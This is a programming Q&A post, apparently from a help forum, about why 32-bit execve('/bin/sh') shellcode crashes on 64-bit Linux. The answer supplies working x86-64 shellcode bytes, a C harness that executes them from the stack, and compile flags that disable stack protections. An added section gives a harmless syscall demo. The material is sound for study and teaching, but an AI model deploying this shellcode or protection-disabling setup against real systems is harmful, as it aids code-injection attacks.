shellcode buffer overflow -SegFault
Problem description
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* 32-bit (i386) execve("/bin//sh") shellcode using the int 0x80 convention */
const char code[] =
"\x31\xc0" /* Line 1: xorl %eax,%eax */
"\x50" /* Line 2: pushl %eax */
"\x68""//sh" /* Line 3: pushl $0x68732f2f */
"\x68""/bin" /* Line 4: pushl $0x6e69622f */
"\x89\xe3" /* Line 5: movl %esp,%ebx */
"\x50" /* Line 6: pushl %eax */
"\x53" /* Line 7: pushl %ebx */
"\x89\xe1" /* Line 8: movl %esp,%ecx */
"\x99" /* Line 9: cdq */
"\xb0\x0b" /* Line 10: movb $0x0b,%al */
"\xcd\x80" /* Line 11: int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code); /* copy the bytes onto the (executable) stack */
((void(*)( ))buf)( ); /* jump to the buffer as if it were a function */
}
I compile it using:
gcc -z execstack -o call_shellcode call_shellcode.c
and
gcc -fno-stack-protector -z execstack -o call_shellcode call_shellcode.c
but I keep getting segmentation fault
Also, I'm running a 64 bit Linux system (ubuntu)
Recommended answer
You are using 32-bit assembly code on an x86-64 system. So, that is your problem; you have to create your shellcode for x86-64 systems.
For example
400078: 48 31 c0 xor rax,rax
40007b: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400082: 2f 73 68
400085: 48 31 f6 xor rsi,rsi
400088: 56 push rsi
400089: 57 push rdi
40008a: 48 89 e7 mov rdi,rsp
40008d: 48 31 d2 xor rdx,rdx
400090: b0 3b mov al,0x3b
400092: 0f 05 syscall
One of the main differences from 32-bit assembly is how to use the syscalls. In this link Linux Syscalls x86-64 you can see what registers you need to call sys_execve
int execve(const char *filename, char *const argv[], char *const envp[]);
- const char *filename -> rdi
- char *const argv[] -> rsi
- char *const envp[] -> rdx
For example
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* x86-64 execve("//bin/sh") shellcode from the disassembly above (no NUL bytes, so strcpy copies it whole) */
const char code[] = "\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}
Compile and test it.
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$ ./shellcode
$ uname -a
Linux foobar 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
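The answer's key point is the register convention: on x86-64 the syscall number goes in rax and the first three arguments in rdi, rsi and rdx, and the instruction is `syscall`, not `int 0x80`. The following is an added example (not part of the original question or answer) that exercises exactly that convention with harmless syscalls (getpid and write) instead of execve, and packs "//bin/sh" little-endian to show where the movabs immediate 0x68732f6e69622f2f in the disassembly comes from. It assumes x86-64 Linux with GCC/Clang inline assembly; the function names raw_syscall3, raw_getpid, raw_write, pack_le8 and write_roundtrip are mine, and on any other platform raw_syscall3 falls back to libc's syscall().

```c
/* Added example, not from the original post: the x86-64 Linux syscall ABI
 * exercised with harmless syscalls. Assumes x86-64 Linux (inline asm);
 * elsewhere it falls back to libc syscall() so the file still builds. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* rax = syscall number, rdi/rsi/rdx = first three arguments, then `syscall`.
 * The kernel clobbers rcx and r11; the return value comes back in rax. */
static long raw_syscall3(long nr, long a1, long a2, long a3)
{
#if defined(__x86_64__) && defined(__linux__)
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
#else
    return syscall(nr, a1, a2, a3);   /* fallback for non-x86-64 builds */
#endif
}

/* getpid takes no arguments: only rax (the number) matters. */
long raw_getpid(void)
{
    return raw_syscall3(SYS_getpid, 0, 0, 0);
}

/* write(fd, buf, len): fd -> rdi, buf -> rsi, len -> rdx, the same three
 * slots execve uses for filename, argv and envp in the answer's table. */
long raw_write(int fd, const char *buf, size_t len)
{
    return raw_syscall3(SYS_write, fd, (long)buf, (long)len);
}

/* Pack up to 8 bytes of a string little-endian. This is how the answer's
 * "movabs rdi,0x68732f6e69622f2f" carries "//bin/sh" inside the instruction:
 * the first character ends up in the lowest byte. */
uint64_t pack_le8(const char *s)
{
    uint64_t v = 0;
    size_t n = strlen(s);
    if (n > 8) n = 8;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}

/* Send a message through a pipe with raw_write and read it back.
 * Returns 1 if the bytes came back intact, 0 otherwise. */
int write_roundtrip(const char *msg)
{
    int fds[2];
    char back[64] = {0};
    size_t len = strlen(msg);
    if (len >= sizeof back || pipe(fds) != 0) return 0;
    long w = raw_write(fds[1], msg, len);
    ssize_t r = read(fds[0], back, sizeof back - 1);
    close(fds[0]);
    close(fds[1]);
    return w == (long)len && r == (ssize_t)len && memcmp(back, msg, len) == 0;
}

int main(void)
{
    printf("raw getpid = %ld, libc getpid = %ld\n", raw_getpid(), (long)getpid());
    printf("\"//bin/sh\" as imm64 = 0x%016llx\n",
           (unsigned long long)pack_le8("//bin/sh"));
    printf("pipe round trip via raw write: %s\n",
           write_roundtrip("abi check") ? "ok" : "FAILED");
    return 0;
}
```

Build it with a plain `gcc syscall_abi.c -o syscall_abi` (no `-z execstack` is needed, since nothing here executes from the stack). The raw getpid value matches libc's, and the packed immediate equals the constant in the disassembly, which is the quickest way to confirm that the answer's shellcode and the 32-bit original differ in calling convention, not in what they ask the kernel to do.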